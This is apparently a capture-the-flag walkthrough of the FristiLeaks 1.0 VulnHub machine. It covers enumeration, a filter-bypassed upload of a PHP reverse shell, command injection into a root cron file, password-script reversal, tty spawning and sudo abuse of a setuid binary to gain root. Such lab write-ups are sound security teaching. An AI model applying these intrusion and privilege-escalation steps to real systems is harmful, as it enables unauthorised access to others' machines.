A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..
nmap -p- -sV 192.168.2.19
Let’s start with robots.txt
Nothing there to be found. Every page was filled with a pic saying I’m off track.
I made a list with all the words found on the pages and ran it with dirb.
Finally another lead……/fristi/.
This seems to be the login portal with an username:password identification.
No SQLi or other notable vulnerabilities. Let’s see the source code.
The information on the page suggest that the image is base64 encoded. So a quick search on the web learns that the first code is the Simpsons pic and the second one is a combination of 2 letters.
This page is created by eezeepz. Would this name plus the letters from the pic be the right combination to login successfully? Yes is would. 🙂
Ok. Now to upload a ‘dirty’ file. Looks like there is a filter and it’s only allowed to use a file with the extension jpg, gif or png. Time to start up Burpsuite and tamper with the file extension. I prefer the php-reverse-shell from pentestmonkey.
Success with the upload and in meantime I started listening on port 31337.
After checking the /home/ directory it seems I can only read the directory from eezeepz.
Inside there is a text file with the name ‘notes’.
Ok. So I have access to echo and chmod and I can use it from /home/admin/.
And from /tmp/ a file named runthis will get executed every minute by root. Well that’s nice. Let’s get the /home/admin/ world writable.
echo “/home/admin/chmod -R 777 /home/admin” > /tmp/runthis
Let’s check out the /home/admin/ directory. Inside there are a few interesting files.
Let’s start with whoisyourgodnow.txt first.
Hmmmmmm. Let’s try another one.
Hmmmmmm. Still nothing.
sh-4.1$ cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
return codecs.encode(base64string[::-1], ‘rot13’)
So the string in cryptedpass.txt is encrypted by cryptpass.py and now needs to be reversed. Let’s write a similar script to reverse the process.
So, I now have 2 plaintexts. Seeing that one of the ciphertexts is owned by a user called fristigod it could be rewarding to switch to this user.
standard in must be a tty
I need a tty. Let’s get one.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
bash-4.1$ su fristigod
Let’s find more stuff from fristigod.
find / print | grep -i fristigod
Who doesn’t like secret stuff? What could it be?
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Nice try, but wrong user 😉
Bummer. But what can this account do?
sudo -l -U fristigod
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep=”COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS”, env_keep+=”MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE”, env_keep+=”LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES”, env_keep+=”LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY”,
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
So. fristigod can run doCom, but as fristi. Let’s try that.
sudo -u fristi ./doCom
Usage: ./program_name terminal_command …
bash-4.1$ sudo -u fristi ./doCom whoami
sudo -u fristi ./doCom whoami
Alright. Time to wrap things up.
sudo -u fristi ./doCom /bin/bash
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
Let’s go to the root directory and take a look inside.
A file named fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it’s supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Too bad not in the 4 hours. But hey. There is always room for improvement.